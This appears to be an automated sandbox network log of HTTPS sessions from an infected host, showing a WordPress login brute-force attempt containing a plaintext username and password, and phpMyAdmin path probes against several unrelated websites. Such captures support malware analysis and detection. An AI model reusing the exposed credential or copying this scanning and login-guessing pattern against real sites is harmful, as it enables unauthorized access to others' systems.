2023-12-22 20:15:03 UTC	1543	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port
217	192.168.2.4	49247	104.26.0.173	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:02 UTC	455	OUT	POST /wp-login.php HTTP/1.1 Host: theproducebox.com Accept: / Accept-Encoding: deflate, gzip Cookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=t3bhc4ud222ni4dqk308a6qgnl User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://theproducebox.com/wp-login.php?redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&reauth=1 Content-Length: 134 Content-Type: application/x-www-form-urlencoded
2023-12-22 20:15:02 UTC	134	OUT	Data Raw: 6c 6f 67 3d 63 61 6d 69 6c 6c 65 26 70 77 64 3d 70 65 72 72 79 37 30 39 25 34 30 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=camille&pwd=perry709%40&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&testcookie=1
2023-12-22 20:15:03 UTC	868	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:15:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.4.15 Pragma: no-cache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Cache-Control: max-age=0, no-cache X-Frame-Options: SAMEORIGIN Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure X-Mod-Pagespeed: 1.13.35.2-0 Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xA7HSlzT%2BAPHJMkXKHIDwST5w0SG98kX4zxN7Z8mRJModsH6BXi0MM8mpSofH7hW%2BWzIvzxxyjFjr0g7kwu8MCPjlkb2yy7fz0ECRBBim8HhnKYoNHYhqLZGH36EaxwziLB%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b08dc2e0567c9-MIA
2023-12-22 20:15:03 UTC	501	IN	Data Raw: 31 38 31 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 54 68 65 20 50 72 6f 64 75 63 65 20 42 6f 78 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 Data Ascii: 1819<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><title>Log In &lsaquo; The Produce Box — WordPress</title><meta name='robots' content='noindex, follow'/><link rel='styleshe
2023-12-22 20:15:03 UTC	1369	IN	Data Raw: 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 66 6f 72 6d 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 66 6f 72 6d 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 32 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 31 30 6e 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 31 30 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 32 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 Data Ascii: nk rel='stylesheet' id='forms-css' href='https://theproducebox.com/wp-admin/css/forms.min.css?ver=6.4.2' media='all'/><link rel='stylesheet' id='l10n-css' href='https://theproducebox.com/wp-admin/css/l10n.min.css?ver=6.4.2' media='all'/><link rel='style
2023-12-22 20:15:03 UTC	1369	IN	Data Raw: 3e 0a 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 75 73 65 72 2d 70 61 73 73 2d 77 72 61 70 22 3e 0a 09 09 09 09 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 75 73 65 72 5f 70 61 73 73 22 3e 50 61 73 73 77 6f 72 64 3c 2f 6c 61 62 65 6c 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 70 77 64 22 3e 0a 09 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 20 6e 61 6d 65 3d 22 70 77 64 22 20 69 64 3d 22 75 73 65 72 5f 70 61 73 73 22 20 61 72 69 61 2d 64 65 73 63 72 69 62 65 64 62 79 3d 22 6c 6f 67 69 6e 5f 65 72 72 6f 72 22 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 20 70 61 73 73 77 6f 72 64 2d 69 6e 70 75 74 22 20 76 61 6c 75 65 3d 22 22 20 73 69 7a 65 3d 22 32 30 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 63 75 72 72 Data Ascii: ><div class="user-pass-wrap"><label for="user_pass">Password</label><div class="wp-pwd"><input type="password" name="pwd" id="user_pass" aria-describedby="login_error" class="input password-input" value="" size="20" autocomplete="curr
2023-12-22 20:15:03 UTC	1369	IN	Data Raw: 29 7b 7d 7d 2c 32 30 30 29 3b 7d 77 70 5f 61 74 74 65 6d 70 74 5f 66 6f 63 75 73 28 29 3b 69 66 28 74 79 70 65 6f 66 20 77 70 4f 6e 6c 6f 61 64 3d 3d 3d 27 66 75 6e 63 74 69 6f 6e 27 29 7b 77 70 4f 6e 6c 6f 61 64 28 29 7d 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 70 20 69 64 3d 22 62 61 63 6b 74 6f 62 6c 6f 67 22 3e 0a 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 22 3e 26 6c 61 72 72 3b 20 47 6f 20 74 6f 20 54 68 65 20 50 72 6f 64 75 63 65 20 42 6f 78 3c 2f 61 3e 09 09 3c 2f 70 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 64 6f 63 75 6d 65 6e 74 Data Ascii: ){}},200);}wp_attempt_focus();if(typeof wpOnload==='function'){wpOnload()}//...</script><p id="backtoblog"><a href="https://theproducebox.com/">← Go to The Produce Box</a></p></div><script type="text/javascript">//<![CDATA[document
2023-12-22 20:15:03 UTC	1369	IN	Data Raw: 22 77 70 2d 70 6f 6c 79 66 69 6c 6c 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 64 69 73 74 2f 68 6f 6f 6b 73 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 63 36 61 65 63 39 61 38 64 34 65 35 61 35 64 35 34 33 61 31 22 20 69 64 3d 22 77 70 2d 68 6f 6f 6b 73 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 64 69 73 Data Ascii: "wp-polyfill-js"></script><script type="text/javascript" src="https://theproducebox.com/wp-includes/js/dist/hooks.min.js?ver=c6aec9a8d4e5a5d543a1" id="wp-hooks-js"></script><script type="text/javascript" src="https://theproducebox.com/wp-includes/js/dis
2023-12-22 20:15:03 UTC	200	IN	Data Raw: 3a 22 30 22 2c 22 6e 6f 6e 63 65 22 3a 22 66 34 30 64 31 32 37 39 61 39 22 7d 3b 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 6a 73 2f 75 73 65 72 2d 70 72 6f 66 69 6c 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 34 2e 32 22 20 69 64 3d 22 75 73 65 72 2d 70 72 6f 66 69 6c 65 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 09 3c 2f 68 74 6d 6c 3e 0a 09 0d 0a Data Ascii: :"0","nonce":"f40d1279a9"};//...</script><script type="text/javascript" src="https://theproducebox.com/wp-admin/js/user-profile.min.js?ver=6.4.2" id="user-profile-js"></script></body></html>
2023-12-22 20:15:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
218	192.168.2.4	49287	13.248.169.48	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:02 UTC	332	OUT	GET /pma/ HTTP/1.1 Host: customizedperformance.com Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:03 UTC	836	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 22 Dec 2023 20:15:03 GMT Content-Type: text/html Content-Length: 12976 Last-Modified: Wed, 13 Dec 2023 20:27:43 GMT Connection: close ETag: "657a13bf-32b0" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_h+Z7+rRkWwOI39WyN2X923WYcaRuSSfCSVvzi/8vOkdO/ekS+7bzFb2fJ19+i+6EwyIhOFVWt1DNsBQwaT7+iA Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=102.129.152.212;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Los%20Angeles";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"implicit"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2023-12-22 20:15:03 UTC	12976	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port
219	192.168.2.4	49349	69.42.204.12	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:02 UTC	166	OUT	GET /pma/ HTTP/1.1 Host: bldowney.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:03 UTC	164	IN	HTTP/1.1 404 Not Found Date: Fri, 22 Dec 2023 20:15:03 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2023-12-22 20:15:03 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port
220	192.168.2.4	49450	34.149.87.45	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:03 UTC	184	OUT	GET /PhpMyAdmin HTTP/1.1 Host: www.valentinegrowers.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:03 UTC	1085	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Content-Language: en Strict-Transport-Security: max-age=3600 X-Wix-Request-Id: 1703276103.3091710215704318969 Age: 0 Cache-Control: no-cache Server: Pepyaka/1.19.10 X-Content-Type-Options: nosniff Accept-Ranges: bytes Date: Fri, 22 Dec 2023 20:15:03 GMT X-Served-By: cache-dfw-kdfw8210021-DFW X-Cache: MISS Vary: Accept-Encoding Server-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_42_g X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLg+F4RAy97FgBhKEMuS3Uv05XEckg9t2+jA6cQOj+vGJ,2d58ifebGbosy5xc+FRaltG2RURvCFm5ir7lafpU/1JySMfSQraj4cC6gt/T0A6a0+KQ8HJWQNHbFuFUvcq3ww==,2UNV7KOq4oGjA5+PKsX47PIHZG7rU4AwWR8fGXl1XwJYgeUJqUXtid+86vZww+nL,S+3YDkrdjZ6isF/aTRkOdUjmz5YjnwZx7K9uZU5HfPQ=,yRDaoXC/28ywKHhtXtgYjDFl/6Qyk2dCxDV7WouodNs=,WDMzHiyOL7uW518fW2ByrxD4X4GGeFX8Xll+nL3Pc+E4qaYh8SZeolIa32w52W7D4AMi8pzlO6fsIL/n0plsbA== Transfer-Encoding: chunked Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2023-12-22 20:15:03 UTC	167	IN	Data Raw: 62 37 31 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 Data Ascii: b71 ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-sca
2023-12-22 20:15:03 UTC	1252	IN	Data Raw: 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c Data Ascii: le=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' \| translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <
2023-12-22 20:15:03 UTC	1252	IN	Data Raw: 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 6a 73 2f 31 2e 32 2e 32 38 2f 69 31 38 6e 2f 61 6e 67 75 6c 61 72 2d 6c 6f 63 61 6c 65 5f 65 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2f 31 2e 31 2e 31 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e Data Ascii: ices/third-party/angularjs/1.2.28/i18n/angular-locale_en.js"></script><script src="//static.parastorage.com/services/third-party/angular-translate/1.1.1/angular-translate.min.js"></script><script src="//static.parastorage.com/services/wix-public/1.719.
2023-12-22 20:15:03 UTC	270	IN	Data Raw: 72 65 64 3c 2f 68 31 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 6e 2d 61 6e 67 75 6c 61 72 2d 73 75 70 70 6f 72 74 65 64 2d 62 72 6f 77 73 65 72 2d 6c 69 6e 6b 22 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 3e 52 65 67 61 72 64 6c 65 73 73 2c 20 77 65 20 72 65 63 6f 6d 6d 65 6e 64 20 79 6f 75 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 72 6f 77 73 65 68 61 70 70 79 2e 63 6f 6d 2f 22 3e 75 70 64 61 74 65 20 79 6f 75 72 20 62 72 6f 77 73 65 72 2e 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 21 2d 2d 20 65 6e 64 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a Data Ascii: red</h1> <div class="non-angular-supported-browser-link"> <span>Regardless, we recommend you to <a href="http://browsehappy.com/">update your browser.</a></span> </div> </div></div>... verification -->... end verification --></body>

Session ID	Source IP	Source Port	Destination IP	Destination Port
221	192.168.2.4	49433	91.132.253.137	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:03 UTC	184	OUT	GET /index.php/ HTTP/1.1 Host: www.flandria-loisirs.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:03 UTC	453	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:15:03 GMT Server: Apache Cache-Control: max-age=21600, s-maxage=21600 Pragma: public Expires: Fri, 22 Dec 2023 21:38:58 GMT Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding X-XSS-Protection: 1; mode=block Content-Security-Policy: default-src * 'unsafe-inline' 'unsafe-eval'; img-src * data: blob: 'unsafe-inline'; Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-12-22 20:15:03 UTC	7739	IN	Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 0a 3c 74 69 74 6c 65 3e 46 6c 61 6e 64 72 69 61 20 4c 6f 69 73 69 72 73 20 2d 20 56 65 6e 74 65 20 4d 6f 62 69 6c 20 68 6f 6d 65 20 6e 65 75 66 73 20 2d 20 56 65 6e 74 65 20 4d 6f 62 69 6c 20 68 6f 6d 65 20 6f 63 63 61 73 69 6f 6e 20 2d 20 4d 6f 62 69 6c 2d 68 6f 6d 65 20 65 6e 20 70 72 6f 6d 6f 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 Data Ascii: 2000<!DOCTYPE html><html lang="fr" prefix="og: http://ogp.me/ns#"> <head> <title>Flandria Loisirs - Vente Mobil home neufs - Vente Mobil home occasion - Mobil-home en promotion</title><meta http-equiv="content-type" content="text/html; c
2023-12-22 20:15:03 UTC	459	IN	Data Raw: 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 69 64 3d 22 62 74 6e 2d 6f 70 65 6e 2d 73 65 61 72 63 68 22 20 63 6c 61 73 73 3d 22 62 74 6e 2d 6f 70 65 6e 2d 73 65 61 72 63 68 22 3e 3c 73 70 61 6e 20 75 6b 2d 69 63 6f 6e 3d 22 69 63 6f 6e 3a 20 73 65 61 72 63 68 3b 20 72 61 74 69 6f 3a 20 31 2e 34 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 2d 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 3e 0a 20 20 20 20 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 75 6b 2d 76 69 73 69 62 6c 65 40 6c 22 3e 0a 20 20 Data Ascii: </a> <a id="btn-open-search" class="btn-open-search"><span uk-icon="icon: search; ratio: 1.4"></span></a> </div> </div> </div></header><div class="o-navigation" id="navigation"> <div class="uk-visible@l">
2023-12-22 20:15:03 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
